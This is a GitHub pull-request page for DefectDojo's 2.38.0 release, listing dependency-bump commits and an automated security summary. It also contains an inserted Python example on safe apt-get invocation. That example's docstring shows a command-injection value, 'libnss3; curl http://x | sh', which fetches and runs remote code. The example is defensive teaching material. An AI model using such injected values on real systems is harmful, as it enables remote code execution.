Release: Merge release into master from: release/2.38.0#10852

Merged
Maffooch merged 89 commits into master from release/2.38.0
Sep 3, 2024

Conversation

github-actions Bot (Contributor) commented Sep 3, 2024

Release triggered by Maffooch

dependabot Bot and others added 30 commits August 5, 2024 11:09
Bumps [debugpy](https://github.com/microsoft/debugpy) from 1.8.2 to 1.8.3.
- [Release notes](https://github.com/microsoft/debugpy/releases)
- [Commits](microsoft/debugpy@v1.8.2...v1.8.3)

---
updated-dependencies:
- dependency-name: debugpy
  dependency-type: direct:production
  update-type: version-update:semver-patch
...

Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
Bumps [django-filter](https://github.com/carltongibson/django-filter) from 24.2 to 24.3.
- [Release notes](https://github.com/carltongibson/django-filter/releases)
- [Changelog](https://github.com/carltongibson/django-filter/blob/main/CHANGES.rst)
- [Commits](carltongibson/django-filter@24.2...24.3)

---
updated-dependencies:
- dependency-name: django-filter
  dependency-type: direct:production
  update-type: version-update:semver-minor
...

Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
Bumps [boto3](https://github.com/boto/boto3) from 1.34.152 to 1.34.153.
- [Release notes](https://github.com/boto/boto3/releases)
- [Commits](boto/boto3@1.34.152...1.34.153)

---
updated-dependencies:
- dependency-name: boto3
  dependency-type: direct:production
  update-type: version-update:semver-patch
...

Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
….0-dev

Release: Merge back 2.37.0 into dev from: master-into-dev/2.37.0-2.38.0-dev
Bumps [ruff](https://github.com/astral-sh/ruff) from 0.5.5 to 0.5.6.
- [Release notes](https://github.com/astral-sh/ruff/releases)
- [Changelog](https://github.com/astral-sh/ruff/blob/main/CHANGELOG.md)
- [Commits](astral-sh/ruff@0.5.5...0.5.6)

---
updated-dependencies:
- dependency-name: ruff
  dependency-type: direct:production
  update-type: version-update:semver-patch
...

Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
* feat(django): Upgrade to 5.0

* Remove obsolete code

* Fix RemovedInDjango60Warning for FORMS_URLFIELD_ASSUME_HTTPS

* fix(multiselectfield): Use original repo

* Upgrade to 5.0.8
Bumps [sqlalchemy](https://github.com/sqlalchemy/sqlalchemy) from 2.0.31 to 2.0.32.
- [Release notes](https://github.com/sqlalchemy/sqlalchemy/releases)
- [Changelog](https://github.com/sqlalchemy/sqlalchemy/blob/main/CHANGES.rst)
- [Commits](https://github.com/sqlalchemy/sqlalchemy/commits)

---
updated-dependencies:
- dependency-name: sqlalchemy
  dependency-type: direct:production
  update-type: version-update:semver-patch
...

Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
Bumps [python-gitlab](https://github.com/python-gitlab/python-gitlab) from 4.8.0 to 4.9.0.
- [Release notes](https://github.com/python-gitlab/python-gitlab/releases)
- [Changelog](https://github.com/python-gitlab/python-gitlab/blob/main/CHANGELOG.md)
- [Commits](python-gitlab/python-gitlab@v4.8.0...v4.9.0)

---
updated-dependencies:
- dependency-name: python-gitlab
  dependency-type: direct:production
  update-type: version-update:semver-minor
...

Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
Bumps [boto3](https://github.com/boto/boto3) from 1.34.153 to 1.34.154.
- [Release notes](https://github.com/boto/boto3/releases)
- [Commits](boto/boto3@1.34.153...1.34.154)

---
updated-dependencies:
- dependency-name: boto3
  dependency-type: direct:production
  update-type: version-update:semver-patch
...

Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
…ackage.json) (#10681)

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
Bumps [boto3](https://github.com/boto/boto3) from 1.34.154 to 1.34.155.
- [Release notes](https://github.com/boto/boto3/releases)
- [Commits](boto/boto3@1.34.154...1.34.155)

---
updated-dependencies:
- dependency-name: boto3
  dependency-type: direct:production
  update-type: version-update:semver-patch
...

Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
Bumps [boto3](https://github.com/boto/boto3) from 1.34.155 to 1.34.156.
- [Release notes](https://github.com/boto/boto3/releases)
- [Commits](boto/boto3@1.34.155...1.34.156)

---
updated-dependencies:
- dependency-name: boto3
  dependency-type: direct:production
  update-type: version-update:semver-patch
...

Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
Bumps [ruff](https://github.com/astral-sh/ruff) from 0.5.6 to 0.5.7.
- [Release notes](https://github.com/astral-sh/ruff/releases)
- [Changelog](https://github.com/astral-sh/ruff/blob/main/CHANGELOG.md)
- [Commits](astral-sh/ruff@0.5.6...0.5.7)

---
updated-dependencies:
- dependency-name: ruff
  dependency-type: direct:production
  update-type: version-update:semver-patch
...

Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
Bumps [boto3](https://github.com/boto/boto3) from 1.34.156 to 1.34.157.
- [Release notes](https://github.com/boto/boto3/releases)
- [Commits](boto/boto3@1.34.156...1.34.157)

---
updated-dependencies:
- dependency-name: boto3
  dependency-type: direct:production
  update-type: version-update:semver-patch
...

Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
Bumps [pdfmake](https://github.com/bpampuch/pdfmake) from 0.2.10 to 0.2.11.
- [Release notes](https://github.com/bpampuch/pdfmake/releases)
- [Changelog](https://github.com/bpampuch/pdfmake/blob/0.2.11/CHANGELOG.md)
- [Commits](bpampuch/pdfmake@0.2.10...0.2.11)

---
updated-dependencies:
- dependency-name: pdfmake
  dependency-type: direct:production
  update-type: version-update:semver-patch
...

Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
…mpose.yml) (#10724)

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
* replace site url variable name to match values.yaml style

* rework app settings block in values.yaml to match file style

* rework uwsgi debug variable setting

* fix configmap boolean value to string

* remove unneeded variable

* update release documentation

* fix variable name

* move documentation to the next release notes

* change description in the changelog

* remove empty line at the end of file
* Change ingress netpol

* Keep old and new options

* Fix lint
Bumps [boto3](https://github.com/boto/boto3) from 1.34.157 to 1.34.158.
- [Release notes](https://github.com/boto/boto3/releases)
- [Commits](boto/boto3@1.34.157...1.34.158)

---
updated-dependencies:
- dependency-name: boto3
  dependency-type: direct:production
  update-type: version-update:semver-patch
...

Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
….0-dev

Release: Merge back 2.37.1 into dev from: master-into-dev/2.37.1-2.38.0-dev
Bumps [lxml](https://github.com/lxml/lxml) from 5.2.2 to 5.3.0.
- [Release notes](https://github.com/lxml/lxml/releases)
- [Changelog](https://github.com/lxml/lxml/blob/master/CHANGES.txt)
- [Commits](lxml/lxml@lxml-5.2.2...lxml-5.3.0)

---
updated-dependencies:
- dependency-name: lxml
  dependency-type: direct:production
  update-type: version-update:semver-minor
...

Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
dependabot Bot and others added 16 commits August 27, 2024 17:53
Bumps [django-dbbackup](https://github.com/jazzband/django-dbbackup) from 4.1.0 to 4.2.1.
- [Release notes](https://github.com/jazzband/django-dbbackup/releases)
- [Changelog](https://github.com/jazzband/django-dbbackup/blob/master/docs/changelog.rst)
- [Commits](Archmonger/django-dbbackup@4.1.0...4.2.1)

---
updated-dependencies:
- dependency-name: django-dbbackup
  dependency-type: direct:production
  update-type: version-update:semver-minor
...

Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
Bumps [boto3](https://github.com/boto/boto3) from 1.35.6 to 1.35.8.
- [Release notes](https://github.com/boto/boto3/releases)
- [Commits](boto/boto3@1.35.6...1.35.8)

---
updated-dependencies:
- dependency-name: boto3
  dependency-type: direct:production
  update-type: version-update:semver-patch
...

Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
* fixing CWE issue

* adding weird findings to unit test

* modifying the unit test to include the weird findings I'm seeing

* restoring file to original state

* creating new file for new unit test

* add new unit test function

merge conflict

* switch to recommended file name

* scan report name change

* adding encoding

* double quotes

---------

Co-authored-by: Timmins, Adam <timminsa@ryanair.com>
…ted (#10429)

* improved naming of findings filter for "on", "before", "after" and added similar for mitigated field on api & UI

* fix ruff

* fix ruff

* Update dojo/filters.py

Co-authored-by: Cody Maffucci <46459665+Maffooch@users.noreply.github.com>

* Update dojo/filters.py

Co-authored-by: Cody Maffucci <46459665+Maffooch@users.noreply.github.com>

* Update dojo/filters.py

Co-authored-by: Cody Maffucci <46459665+Maffooch@users.noreply.github.com>

* fix ruff

* fix ruff

* Update dojo/filters.py

---------

Co-authored-by: Cody Maffucci <46459665+Maffooch@users.noreply.github.com>
Co-authored-by: Cody Maffucci <cmmaffucci@gmail.com>
Bumps [python-gitlab](https://github.com/python-gitlab/python-gitlab) from 4.9.0 to 4.10.0.
- [Release notes](https://github.com/python-gitlab/python-gitlab/releases)
- [Changelog](https://github.com/python-gitlab/python-gitlab/blob/main/CHANGELOG.md)
- [Commits](python-gitlab/python-gitlab@v4.9.0...v4.10.0)

---
updated-dependencies:
- dependency-name: python-gitlab
  dependency-type: direct:production
  update-type: version-update:semver-minor
...

Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
Bumps [boto3](https://github.com/boto/boto3) from 1.35.8 to 1.35.9.
- [Release notes](https://github.com/boto/boto3/releases)
- [Commits](boto/boto3@1.35.8...1.35.9)

---
updated-dependencies:
- dependency-name: boto3
  dependency-type: direct:production
  update-type: version-update:semver-patch
...

Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
Bumps [ruff](https://github.com/astral-sh/ruff) from 0.6.2 to 0.6.3.
- [Release notes](https://github.com/astral-sh/ruff/releases)
- [Changelog](https://github.com/astral-sh/ruff/blob/main/CHANGELOG.md)
- [Commits](astral-sh/ruff@0.6.2...0.6.3)

---
updated-dependencies:
- dependency-name: ruff
  dependency-type: direct:production
  update-type: version-update:semver-patch
...

Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
Bugfix -> Dev: Release 2.38.0
dryrunsecurity Bot commented Sep 3, 2024

DryRun Security Summary

The provided GitHub Pull Request includes a variety of changes across multiple files in the DefectDojo application, covering documentation updates, dependency version updates, configuration changes, and updates to the core application code, with a few areas that deserve closer attention for potential security implications, such as input validation, access control, secure communication, logging and monitoring, and the need for regular security assessments.


Summary:

The provided GitHub Pull Request includes a variety of changes across multiple files in the DefectDojo application. The changes cover a wide range of functionality, including documentation updates, dependency version updates, configuration changes, and updates to the core application code.

From an application security perspective, the changes do not introduce any obvious security vulnerabilities. However, there are a few areas that deserve closer attention:

  1. Input Validation and Sanitization: Ensure that all user-provided input is properly validated and sanitized to prevent common web application vulnerabilities, such as SQL injection, cross-site scripting (XSS), and others.
  2. Access Control and Authorization: Verify that the user permissions and access controls are properly implemented, ensuring that users can only access the data and functionality they are authorized to.
  3. Secure Communication: Ensure that the application uses secure communication protocols (e.g., HTTPS) to protect sensitive data during transit.
  4. Logging and Monitoring: Verify that the application has robust logging and monitoring mechanisms in place to detect and respond to security incidents.
  5. Regular Security Assessments: Conduct regular security assessments, such as penetration testing and code reviews, to identify and address any potential security vulnerabilities in the application.

Files Changed:

  1. README.md: Minor update to the "Hall of Fame" section, which does not introduce any security concerns.
  2. components/package.json: Update to the DefectDojo application version and a dependency version update, which should be reviewed for any known security vulnerabilities.
  3. components/yarn.lock: Update to the pdfmake library version, which should be reviewed for any security-related changes.
  4. docker-compose.override.dev.yml: Changes to the development environment configuration, including the use of administrative credentials and debugging features, which should be properly addressed before deploying to production.
  5. Dockerfile.integration-tests-debian: Updates to the base image and dependencies, which should be reviewed for any known security vulnerabilities.
  6. NOTICE: Documentation update, which does not introduce any security concerns.
  7. docs/content/en/contributing/documentation.md: Documentation update, which does not introduce any security concerns.
  8. docker/install_chrome_dependencies.py: Script to install Chrome dependencies, which should be reviewed for potential command injection vulnerabilities and proper error handling.
  9. docker-compose.yml: Update to the PostgreSQL Docker image version, which should be reviewed for any security-related changes.
  10. docker/setEnv.sh: Script to manage the Docker environment configuration, which appears to be a routine maintenance update.
  11. docs/content/en/getting_started/upgrading/2.38.md: Documentation update for the HELM deployment configuration, which does not introduce any security concerns.
  12. docs/content/en/integrations/parsers/file/blackduck_binary_analysis.md: Documentation update, which does not introduce any security concerns.
  13. docs/content/en/contributing/how-to-write-a-parser.md: Documentation update, which highlights some important security practices for contributing parsers.
  14. docs/package-lock.json: Update to the postcss package version, which should be reviewed for any security-related changes.
  15. docs/package.json: Update to the postcss package version, which should be reviewed for any security-related changes.
  16. dojo/__init__.py: Update to the DefectDojo application version, which should be reviewed for any security-related changes.
  17. dojo/api_v2/views.py: Refactoring of the API views, which should be reviewed for any potential security implications.
  18. dojo/apps.py: Changes to the application initialization and configuration, including the setup of Watson search indexing, which should be reviewed for any potential security implications.
  19. dojo/api_v2/serializers.py: Updates to the serializers, including improvements to validation and JIRA integration, which should be reviewed for any security-related changes.
  20. dojo/engagement/services.py: Changes to the engagement closing and reopening functionality, which should be reviewed for any potential security implications.
  21. dojo/engagement/signals.py: Changes to the engagement-related signal handlers, which do not appear to introduce any security concerns.
  22. dojo/engagement/views.py: Updates to the engagement management functionality, including the handling of credential mappings, which should be reviewed for any security-related changes.
    23

Code Analysis

We ran 9 analyzers against 30 files and 2 analyzers had findings. 7 analyzers had no findings.

Analyzer                  Findings
Sensitive Files Analyzer  3
Authn/Authz Analyzer      4

Riskiness

🟢 Risk threshold not exceeded.

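The DryRun summary above flags docker/install_chrome_dependencies.py for command-injection review. The block below is an added illustration of the pattern a reviewer would want to see in such a script; it is not DefectDojo's script and is not taken from the pull request. It assumes (an assumption, not something the page states) that the script follows the usual shape of running `ldd` on the Chrome binary, mapping "not found" libraries to Debian packages, and invoking apt-get. The ldd output and the library-to-package map are constructed for the example. The point it demonstrates: keep the apt-get invocation as an argv list with no shell, validate every package name against the Debian name grammar before it reaches the command line, terminate option parsing with `--`, and let a non-zero exit raise instead of being ignored.

```python
"""
Added example (not DefectDojo's own docker/install_chrome_dependencies.py):
parse `ldd` output for missing shared libraries, map them to Debian/Ubuntu
packages, validate the package names, and build an apt-get argv that is
passed to subprocess without a shell. The ldd lines and the
library-to-package map below are constructed for this example.
"""
import re
import subprocess
from typing import Iterable

# Constructed sample: roughly what `ldd /opt/chrome/chrome` prints when two
# shared libraries are absent. Not captured from a real host.
SAMPLE_LDD_OUTPUT = """\
\tlinux-vdso.so.1 (0x00007ffd2b1f0000)
\tlibnss3.so => not found
\tlibatk-bridge-2.0.so.0 => not found
\tlibc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f3a8c000000)
"""

# Constructed mapping of shared-library names to Debian package names.
LIB_TO_PACKAGE = {
    "libnss3.so": "libnss3",
    "libatk-bridge-2.0.so.0": "libatk-bridge2.0-0",
}

# Debian policy: package names are lowercase ASCII letters, digits, '+', '-',
# '.', at least two characters, and must start with an alphanumeric.
_PACKAGE_NAME = re.compile(r"^[a-z0-9][a-z0-9+.-]+$")
_NOT_FOUND = re.compile(r"^\s*(\S+)\s+=>\s+not found\s*$", re.MULTILINE)


def parse_missing_libs(ldd_output: str) -> list[str]:
    """Return the shared-library names that ldd reported as 'not found'."""
    return _NOT_FOUND.findall(ldd_output)


def validate_package_name(name: str) -> str:
    """Reject anything that is not a well-formed Debian package name.

    Shell metacharacters (';', '|', '$', whitespace, ...) never match, so a
    value that reaches apt-get cannot smuggle in a second command even if
    the name originated from untrusted data (e.g. a parsed ldd line).
    """
    if not _PACKAGE_NAME.fullmatch(name):
        raise ValueError(f"refusing suspicious package name: {name!r}")
    return name


def packages_for(missing_libs: Iterable[str]) -> list[str]:
    """Map missing libraries to validated, de-duplicated package names."""
    pkgs: list[str] = []
    for lib in missing_libs:
        pkg = LIB_TO_PACKAGE.get(lib)
        if pkg is None:
            # Unknown library: fail loudly rather than guess a package name.
            raise KeyError(f"no package mapping for {lib}")
        pkg = validate_package_name(pkg)
        if pkg not in pkgs:
            pkgs.append(pkg)
    return pkgs


def build_install_argv(packages: list[str]) -> list[str]:
    """Build the apt-get argv as a list. The '--' stops option parsing, so a
    package name can never be interpreted as an apt-get flag."""
    return ["apt-get", "install", "-y", "--",
            *[validate_package_name(p) for p in packages]]


def build_install_command_unsafe(packages: list[str]) -> str:
    """The pattern to avoid: a string joined for shell=True. A name such as
    'libnss3; curl http://x | sh' would execute as two commands."""
    return "apt-get install -y " + " ".join(packages)


def install_packages(packages: list[str], dry_run: bool = True) -> list[str]:
    """Run apt-get without a shell. check=True turns a non-zero exit into an
    exception instead of continuing with a half-installed Chrome."""
    argv = build_install_argv(packages)
    if not dry_run:
        subprocess.run(argv, check=True)
    return argv


if __name__ == "__main__":
    missing = parse_missing_libs(SAMPLE_LDD_OUTPUT)
    print("missing:", missing)
    print("argv:", install_packages(packages_for(missing), dry_run=True))
```

Run with `dry_run=True` the block only prints the argv it would execute; pass `dry_run=False` as root on a Debian-based image to perform the install. The contrast worth noting in review is `build_install_argv` (list argv, validated names, `--`) against `build_install_command_unsafe` (string for a shell): the former cannot be turned into a second command by any package name, the latter can.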

Maffooch closed this Sep 3, 2024
Maffooch reopened this Sep 3, 2024
github-actions Bot added the labels docker, settings_changes (Needs changes to settings.py based on changes in settings.dist.py included in this PR), apiv2, docs, unittests, integration_tests, ui, parser, helm, localization on Sep 3, 2024
Maffooch merged commit 1386330 into master Sep 3, 2024